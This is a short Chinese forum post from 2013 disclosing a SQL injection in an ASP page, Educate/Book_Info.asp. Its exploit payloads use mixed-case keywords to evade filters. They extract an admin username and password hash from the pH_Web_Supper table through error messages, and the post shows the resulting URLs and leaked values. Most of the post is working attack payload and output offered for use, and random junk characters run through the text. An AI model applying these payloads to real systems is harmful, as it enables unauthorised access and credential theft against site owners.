漏洞出现在Educate/Book_Info.asp
' }! C5 `2 B' i
! A; |. L; p+ d0 t+ `此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
; y& L* m" A# A1 d- F/ n" \ . q3 _1 y) {; T, h
exp:如下
1 Y J$ M8 g( N+ m( c8 X查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
! q1 ?" x6 j! V. X8 ^2 P4 `( j查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
& g$ }7 @: C; A x8 t) t1 i/ J2 q: d+ F4 h
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
7 r: _9 G! Y# ~0 v% U$ L
0 K- ?( h/ l! qMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
( d, `& y" [2 j0 h b! w! ^5 }2 G
8 y, b$ o! k' T将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。8 o, n' a# t: T1 T+ [5 A
P( V/ ^4 r. q7 Z8 ?9 |. B
/Educate/Book_Info.asp,行 8
0 t" Z2 j' L8 \0 M- J# K8 m V) U + I' H" u# u4 P3 j2 s
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)% A3 E% R2 F6 L: o" z
& \1 o6 C( e) R' Z+ a
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'% k2 a4 }+ T# ]
/ p( `! c! ~1 V$ ]; y
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。, W/ @, }- b' f/ r+ X# X0 }
: T* w, d+ A4 p" F$ I4 q/Educate/Book_Info.asp,行 8
) \& f/ s* T: r9 \/ T |
发表于 2013-2-16 21:44:16
收藏
支持
反对